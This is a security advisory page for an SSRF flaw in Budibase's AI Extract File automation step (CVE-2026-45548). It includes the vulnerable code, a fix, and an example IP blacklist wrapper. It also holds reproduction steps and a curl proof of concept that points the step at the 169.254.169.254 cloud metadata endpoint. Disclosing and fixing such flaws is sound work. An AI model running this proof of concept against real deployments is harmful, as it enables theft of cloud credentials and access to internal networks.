VYPR
High severity · 7.7 · NVD Advisory · Published May 15, 2026

Budibase: SSRF in AI Extract File Automation Step via Missing IP Blacklist Validation

CVE-2026-45548

Description

Vulnerability Details

CWE-918: Server-Side Request Forgery (SSRF)

The processUrlFile function in packages/server/src/automations/steps/ai/extract.ts uses fetch(fileUrl) directly without the IP blacklist validation that is consistently applied to all other automation steps. This allows an authenticated user to trigger server-side requests to internal network addresses.

Vulnerable Code

**packages/server/src/automations/steps/ai/extract.ts (lines 116, 139)**:

async function processUrlFile(fileUrl: string, ...): Promise {
  const response = await fetch(fileUrl)  // NO blacklist check!
  // ...
  const fallbackResponse = await fetch(fileUrl)  // Also NO blacklist check!
}

Contrast with All Other Automation Steps (Same Codebase)

Every other automation step that makes outbound HTTP requests properly uses fetchWithBlacklist:

  • steps/slack.ts:19: response = await fetchWithBlacklist(url, {...})
  • steps/discord.ts:28: response = await fetchWithBlacklist(url, {...})
  • steps/zapier.ts:33: response = await fetchWithBlacklist(url, {...})
  • steps/n8n.ts:53: response = await fetchWithBlacklist(url, request)
  • steps/outgoingWebhook.ts: response = await fetchWithBlacklist(url, {...})
  • steps/make.ts: response = await fetchWithBlacklist(url, {...})

The fetchWithBlacklist function (steps/utils.ts:100) validates URLs against the IP blacklist, which blocks:

  • 127.0.0.0/8 (loopback)
  • 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16 (RFC1918 private)
  • 169.254.0.0/16 (link-local / cloud metadata)
  • IPv6 private addresses

The AI Extract File step bypasses all of these protections.

Steps to Reproduce

Via Budibase UI

  1. Log in as a builder user
  2. Create or open any app
  3. Go to Automations > New Automation
  4. Add trigger: App Action
  5. Add step: AI > Extract File Data
  6. Set Source: URL
  7. Set File URL: http://169.254.169.254/latest/meta-data/ (or any internal IP)
  8. Click Run Test — the server makes the request without IP blacklist validation

Via curl (API)

# 1. Login and get session cookie
curl -s -c /tmp/bb.txt \
  "http://BUDIBASE_HOST/api/global/auth/default/login" \
  -X POST -H "Content-Type: application/json" \
  -d '{"username":"YOUR_EMAIL","password":"YOUR_PASSWORD"}'

# 2. Create automation with SSRF payload (replace YOUR_APP_ID)
curl -s -b /tmp/bb.txt \
  "http://BUDIBASE_HOST/api/automations" \
  -X POST -H "Content-Type: application/json" \
  -H "x-budibase-app-id: YOUR_APP_ID" \
  -d '{"name":"SSRF PoC","definition":{"trigger":{"stepId":"APP","event":"row:save"},"steps":[{"stepId":"AI_EXTRACT","inputs":{"source":"URL","fileUrl":"http://169.254.169.254/latest/meta-data/"}}]}}'

Code Review Verification

Compare the vulnerable function with the safe pattern used everywhere else:

VULNERABLE (no blacklist):
  packages/server/src/automations/steps/ai/extract.ts:116
    const response = await fetch(fileUrl)

SAFE (with blacklist) - every other step:
  packages/server/src/automations/steps/slack.ts:19
    response = await fetchWithBlacklist(url, {...})
  packages/server/src/automations/steps/discord.ts:28
    response = await fetchWithBlacklist(url, {...})

Expected vs Actual Behavior

Expected: processUrlFile() should reject internal/private IPs via fetchWithBlacklist().

Actual: fetch(fileUrl) is called directly, allowing requests to 127.0.0.1, 10.x.x.x, 169.254.169.254, etc.

Impact

An authenticated user with builder permissions can:

  • Access cloud metadata endpoints (AWS IAM credentials, GCP service tokens, Azure IMDS)
  • Scan internal network services and ports
  • Access internal APIs not intended for external access
  • Exfiltrate data from internal services via the automation response

In Budibase Cloud (SaaS), this could be used to steal cloud provider credentials, potentially leading to full infrastructure compromise.

Proposed Fix

Replace fetch(fileUrl) with fetchWithBlacklist(fileUrl), consistent with all other automation steps:

import { fetchWithBlacklist } from "../utils"

async function processUrlFile(fileUrl: string, ...): Promise {
  const response = await fetchWithBlacklist(fileUrl)  // Use blacklist
  // ...
  const fallbackResponse = await fetchWithBlacklist(fileUrl)  // Use blacklist
}
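The blacklist described above and the proposed fetchWithBlacklist replacement, as an added example that is not Budibase's own code: a wrapper that resolves the URL's host, checks every resulting address against the listed ranges, and only then calls fetch. The ranges are the ones the advisory names; ::1, fc00::/7 and fe80::/10 are assumed for its "IPv6 private addresses" entry, and the function names are this example's own.

```typescript
import * as net from "node:net";
import { promises as dns } from "node:dns";

// Ranges the advisory lists for the blacklist; ::1, fc00::/7 and fe80::/10
// are assumed here for its "IPv6 private addresses" entry.
const BLOCKED = new net.BlockList();
BLOCKED.addSubnet("127.0.0.0", 8, "ipv4");    // loopback
BLOCKED.addSubnet("10.0.0.0", 8, "ipv4");     // RFC1918
BLOCKED.addSubnet("172.16.0.0", 12, "ipv4");  // RFC1918
BLOCKED.addSubnet("192.168.0.0", 16, "ipv4"); // RFC1918
BLOCKED.addSubnet("169.254.0.0", 16, "ipv4"); // link-local / cloud metadata
BLOCKED.addAddress("::1", "ipv6");            // IPv6 loopback
BLOCKED.addSubnet("fc00::", 7, "ipv6");       // IPv6 unique local
BLOCKED.addSubnet("fe80::", 10, "ipv6");      // IPv6 link-local

// True when ip is inside a blocked range. BlockList matches IPv4-mapped
// IPv6 literals (::ffff:a.b.c.d) against the IPv4 rules, so that bypass
// is covered too. Anything that is not an IP literal is refused.
export function isBlockedAddress(ip: string): boolean {
  const family = net.isIP(ip);
  if (family === 4) return BLOCKED.check(ip, "ipv4");
  if (family === 6) return BLOCKED.check(ip, "ipv6");
  return true;
}

// Hostname of a URL with IPv6 brackets stripped, e.g. "http://[::1]/" -> "::1".
export function hostOf(url: string): string {
  return new URL(url).hostname.replace(/^\[|\]$/g, "");
}

// Resolve every address the host maps to and reject if any one is blocked,
// so a mixed public/private DNS answer cannot slip through.
export async function assertNotBlacklisted(url: string): Promise<void> {
  const host = hostOf(url);
  const addrs = net.isIP(host)
    ? [host]
    : (await dns.lookup(host, { all: true })).map((a) => a.address);
  for (const a of addrs) {
    if (isBlockedAddress(a)) throw new Error(`blocked host ${host} (${a})`);
  }
}

// Drop-in for the bare fetch(fileUrl) call in processUrlFile. Caveat: fetch
// resolves the name again, so a rebinding DNS answer can still differ from
// what was checked; pinning the connection to the checked address closes that.
export async function fetchWithBlacklist(url: string, init?: Parameters<typeof fetch>[1]) {
  await assertNotBlacklisted(url);
  return fetch(url, init);
}
```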

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Authenticated SSRF in Budibase AI Extract File step due to missing IP blacklist, allowing internal network requests.

Vulnerability

The processUrlFile function in packages/server/src/automations/steps/ai/extract.ts uses fetch(fileUrl) directly without the IP blacklist validation (fetchWithBlacklist) that all other automation steps employ [1][2]. This CWE-918 SSRF vulnerability affects all versions prior to the fix in 3.38.4 [4]. An authenticated user with the builder role can trigger server-side requests to internal network addresses, including loopback, RFC1918 private ranges, and link-local addresses such as cloud metadata endpoints [2][3].

Exploitation

An attacker must be an authenticated user with builder access to create or modify automations [2][3]. Via the UI, they navigate to Automations, add an AI Extract File Data step, set Source to URL, and provide an internal IP (e.g., http://169.254.169.254/latest/meta-data/). Running the test initiates a server-side request without any IP blacklist validation [2][3]. Alternatively, the same can be done via the API using a session cookie.

Impact

Successful exploitation allows the attacker to make the Budibase server send HTTP requests to arbitrary internal hosts, potentially accessing cloud metadata services (e.g., AWS, GCP), internal services, or other resources not meant to be accessible from the outside [2][3]. This can lead to disclosure of sensitive information such as cloud provider credentials, internal service credentials, or configuration data.

Mitigation

The vulnerability is fixed in Budibase version 3.38.4, released on 2026-05-15 [4]. Users should upgrade immediately. No workaround is available other than restricting builder role assignments to trusted users. The CVE is not listed in CISA KEV as of publication.

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
